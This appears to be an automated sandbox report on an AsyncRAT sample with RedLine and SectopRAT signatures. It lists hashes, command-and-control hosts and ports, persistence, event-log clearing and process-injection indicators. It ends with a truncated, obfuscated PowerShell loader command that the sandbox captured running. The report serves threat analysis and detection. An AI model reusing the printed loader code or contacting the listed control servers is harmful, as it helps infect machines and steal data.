asyncrat | 1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db

Analysis

max time kernel
150s
max time network
149s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
05-08-2024 15:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe
Size

322KB
MD5

59d3bc9ca446bf4fcce3a93cdbce134a
SHA1

37120e1b71956b5f3852605db0f33f4565a3952d
SHA256

1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db
SHA512

d23ddc6d55d8bf237e68d946f1a330a14907ea2b891ccea0890f63ee0f47f746b6e1d9d2151da1744b36d14b06b428fe308ffd97ae44732f3491682610950b63
SSDEEP

6144:3RptkRZIFoIkY/7J81GyQUMTa5+suXqWxHNDf1CPyysAosQSPJHdlLTpn:jHoIfjJ80Rl86xHTCPvsASQJHd

Score

10^/10

asyncrat redline sectoprat server.underground-cheat.xyz defense_evasion discovery execution infostealer rat trojan

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

blue.o7lab.me:7777

server.underground-cheat.xyz:7777

Mutex

RPYntXGt1eJi

Attributes

delay
3
install
true
install_file
WinUpdate.exe
install_folder
%AppData%

aes.plain

Extracted

Family

redline

Botnet

server.underground-cheat.xyz

server.underground-cheat.xyz:1337

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000200000002aade-5010.dat	family_redline
behavioral2/memory/4652-5044-0x0000000000050000-0x000000000006E000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000200000002aade-5010.dat	family_sectoprat
behavioral2/memory/4652-5044-0x0000000000050000-0x000000000006E000-memory.dmp	family_sectoprat

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 1072 created 632	1072	powershell.EXE	5
PID 3648 created 632	3648	powershell.EXE	5

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x000200000002aad5-25.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2308	powershell.exe
1072	powershell.EXE
3648	powershell.EXE
4472	powershell.exe
4104	powershell.exe
3416	powershell.exe

Executes dropped EXE 7 IoCs

pid	Process
1444	Install.exe
1832	$77svchost.exe
4616	WinUpdate.exe
3532	wrmeaz.exe
4652	rjsztz.exe
3544	olpylu.exe
2936	TypeId.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	svchost.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\WaitHandle\TypeId	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\$77svc64	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\WinUpdate	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\suspuwgyc	svchost.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1072 set thread context of 4800	1072	powershell.EXE	86
PID 3648 set thread context of 5012	3648	powershell.EXE	113
PID 2936 set thread context of 2456	2936	TypeId.exe	115

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rjsztz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	olpylu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4152	timeout.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 05 Aug 2024 15:20:56 GMT"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1722871255"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
72	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1072	powershell.EXE
1072	powershell.EXE
1072	powershell.EXE
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
4800	dllhost.exe
1832	$77svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1072	powershell.EXE
Token: SeDebugPrivilege	1072	powershell.EXE
Token: SeDebugPrivilege	4800	dllhost.exe
Token: SeDebugPrivilege	1832	$77svchost.exe
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeDebugPrivilege	4616	WinUpdate.exe
Token: SeAssignPrimaryTokenPrivilege	2644	svchost.exe
Token: SeIncreaseQuotaPrivilege	2644	svchost.exe
Token: SeSecurityPrivilege	2644	svchost.exe
Token: SeTakeOwnershipPrivilege	2644	svchost.exe
Token: SeLoadDriverPrivilege	2644	svchost.exe
Token: SeSystemtimePrivilege	2644	svchost.exe
Token: SeBackupPrivilege	2644	svchost.exe
Token: SeRestorePrivilege	2644	svchost.exe
Token: SeShutdownPrivilege	2644	svchost.exe
Token: SeSystemEnvironmentPrivilege	2644	svchost.exe
Token: SeUndockPrivilege	2644	svchost.exe
Token: SeManageVolumePrivilege	2644	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2644	svchost.exe
Token: SeIncreaseQuotaPrivilege	2644	svchost.exe
Token: SeSecurityPrivilege	2644	svchost.exe
Token: SeTakeOwnershipPrivilege	2644	svchost.exe
Token: SeLoadDriverPrivilege	2644	svchost.exe
Token: SeSystemtimePrivilege	2644	svchost.exe
Token: SeBackupPrivilege	2644	svchost.exe
Token: SeRestorePrivilege	2644	svchost.exe
Token: SeShutdownPrivilege	2644	svchost.exe
Token: SeSystemEnvironmentPrivilege	2644	svchost.exe
Token: SeUndockPrivilege	2644	svchost.exe
Token: SeManageVolumePrivilege	2644	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2644	svchost.exe
Token: SeIncreaseQuotaPrivilege	2644	svchost.exe
Token: SeSecurityPrivilege	2644	svchost.exe
Token: SeTakeOwnershipPrivilege	2644	svchost.exe
Token: SeLoadDriverPrivilege	2644	svchost.exe
Token: SeSystemtimePrivilege	2644	svchost.exe
Token: SeBackupPrivilege	2644	svchost.exe
Token: SeRestorePrivilege	2644	svchost.exe
Token: SeShutdownPrivilege	2644	svchost.exe
Token: SeSystemEnvironmentPrivilege	2644	svchost.exe
Token: SeUndockPrivilege	2644	svchost.exe
Token: SeManageVolumePrivilege	2644	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2644	svchost.exe
Token: SeIncreaseQuotaPrivilege	2644	svchost.exe
Token: SeSecurityPrivilege	2644	svchost.exe
Token: SeTakeOwnershipPrivilege	2644	svchost.exe
Token: SeLoadDriverPrivilege	2644	svchost.exe
Token: SeSystemtimePrivilege	2644	svchost.exe
Token: SeBackupPrivilege	2644	svchost.exe
Token: SeRestorePrivilege	2644	svchost.exe
Token: SeShutdownPrivilege	2644	svchost.exe
Token: SeSystemEnvironmentPrivilege	2644	svchost.exe
Token: SeUndockPrivilege	2644	svchost.exe
Token: SeManageVolumePrivilege	2644	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2644	svchost.exe
Token: SeIncreaseQuotaPrivilege	2644	svchost.exe
Token: SeSecurityPrivilege	2644	svchost.exe
Token: SeTakeOwnershipPrivilege	2644	svchost.exe
Token: SeLoadDriverPrivilege	2644	svchost.exe
Token: SeSystemtimePrivilege	2644	svchost.exe
Token: SeBackupPrivilege	2644	svchost.exe
Token: SeRestorePrivilege	2644	svchost.exe
Token: SeShutdownPrivilege	2644	svchost.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3920	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1264 wrote to memory of 1444	1264	1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe	82
PID 1264 wrote to memory of 1444	1264	1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe	82
PID 1264 wrote to memory of 1444	1264	1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe	82
PID 1264 wrote to memory of 1832	1264	1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe	83
PID 1264 wrote to memory of 1832	1264	1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe	83
PID 1264 wrote to memory of 1832	1264	1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe	83
PID 1072 wrote to memory of 4800	1072	powershell.EXE	86
PID 1072 wrote to memory of 4800	1072	powershell.EXE	86
PID 1072 wrote to memory of 4800	1072	powershell.EXE	86
PID 1072 wrote to memory of 4800	1072	powershell.EXE	86
PID 1072 wrote to memory of 4800	1072	powershell.EXE	86
PID 1072 wrote to memory of 4800	1072	powershell.EXE	86
PID 1072 wrote to memory of 4800	1072	powershell.EXE	86
PID 1072 wrote to memory of 4800	1072	powershell.EXE	86
PID 4800 wrote to memory of 632	4800	dllhost.exe	5
PID 4800 wrote to memory of 688	4800	dllhost.exe	7
PID 4800 wrote to memory of 988	4800	dllhost.exe	12
PID 4800 wrote to memory of 460	4800	dllhost.exe	13
PID 4800 wrote to memory of 452	4800	dllhost.exe	14
PID 4800 wrote to memory of 892	4800	dllhost.exe	15
PID 4800 wrote to memory of 1064	4800	dllhost.exe	16
PID 4800 wrote to memory of 1124	4800	dllhost.exe	17
PID 4800 wrote to memory of 1136	4800	dllhost.exe	18
PID 4800 wrote to memory of 1212	4800	dllhost.exe	20
PID 4800 wrote to memory of 1220	4800	dllhost.exe	21
PID 4800 wrote to memory of 1228	4800	dllhost.exe	22
PID 4800 wrote to memory of 1384	4800	dllhost.exe	23
PID 4800 wrote to memory of 1404	4800	dllhost.exe	24
PID 4800 wrote to memory of 1424	4800	dllhost.exe	25
PID 4800 wrote to memory of 1540	4800	dllhost.exe	26
PID 4800 wrote to memory of 1564	4800	dllhost.exe	27
PID 4800 wrote to memory of 1688	4800	dllhost.exe	28
PID 4800 wrote to memory of 1736	4800	dllhost.exe	29
PID 4800 wrote to memory of 1756	4800	dllhost.exe	30
PID 4800 wrote to memory of 1820	4800	dllhost.exe	31
PID 4800 wrote to memory of 1872	4800	dllhost.exe	32
PID 4800 wrote to memory of 1896	4800	dllhost.exe	33
PID 4800 wrote to memory of 1904	4800	dllhost.exe	34
PID 4800 wrote to memory of 2008	4800	dllhost.exe	35
PID 4800 wrote to memory of 1468	4800	dllhost.exe	36
PID 4800 wrote to memory of 2104	4800	dllhost.exe	37
PID 4800 wrote to memory of 2252	4800	dllhost.exe	39
PID 4800 wrote to memory of 2388	4800	dllhost.exe	40
PID 4800 wrote to memory of 2500	4800	dllhost.exe	41
PID 4800 wrote to memory of 2508	4800	dllhost.exe	42
PID 4800 wrote to memory of 2556	4800	dllhost.exe	43
PID 4800 wrote to memory of 2624	4800	dllhost.exe	44
PID 4800 wrote to memory of 2636	4800	dllhost.exe	45
PID 4800 wrote to memory of 2644	4800	dllhost.exe	46
PID 4800 wrote to memory of 2656	4800	dllhost.exe	47
PID 4800 wrote to memory of 2708	4800	dllhost.exe	48
PID 4800 wrote to memory of 3060	4800	dllhost.exe	49
PID 4800 wrote to memory of 2060	4800	dllhost.exe	50
PID 4800 wrote to memory of 700	4800	dllhost.exe	52
PID 4800 wrote to memory of 3304	4800	dllhost.exe	53
PID 4800 wrote to memory of 3432	4800	dllhost.exe	54
PID 4800 wrote to memory of 3468	4800	dllhost.exe	55
PID 4800 wrote to memory of 3840	4800	dllhost.exe	58
PID 4800 wrote to memory of 3920	4800	dllhost.exe	59
PID 4800 wrote to memory of 3976	4800	dllhost.exe	60
PID 4800 wrote to memory of 4024	4800	dllhost.exe	61
PID 4800 wrote to memory of 4256	4800	dllhost.exe	62
PID 4800 wrote to memory of 4404	4800	dllhost.exe	63
PID 4800 wrote to memory of 1044	4800	dllhost.exe	66

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:632
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:460
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f2b6375e-0724-4664-980f-4050df523ef4}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4800
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9f76ad8a-eb5b-4165-be5a-0c7d293b0a0e}
  2⤵
  PID:5012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:988

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1124
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cAYNCcTcmszh{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PsEFxNOHqraMOw,[Parameter(Position=1)][Type]$YbIucFvpZQ)$XzLHPKRelZM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+'le'+'c'+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+'M'+'e'+'m'+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+'o'+''+[Char](100)+''+'u'+'l'+'e'+'',$False).DefineType('My'+[Char](68)+'e'+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e'+[Char](84)+'y'+'p'+''+[Char](101)+'',''+'C'+'la'+[Char](115)+''+'s'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c,S'+[Char](101)+''+'a'+'led'+','+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+'ss'+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+'C'+'l'+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$XzLHPKRelZM.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+'c'+'ial'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+','+'H'+[Char](105)+''+'d'+''+'e'+''+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+'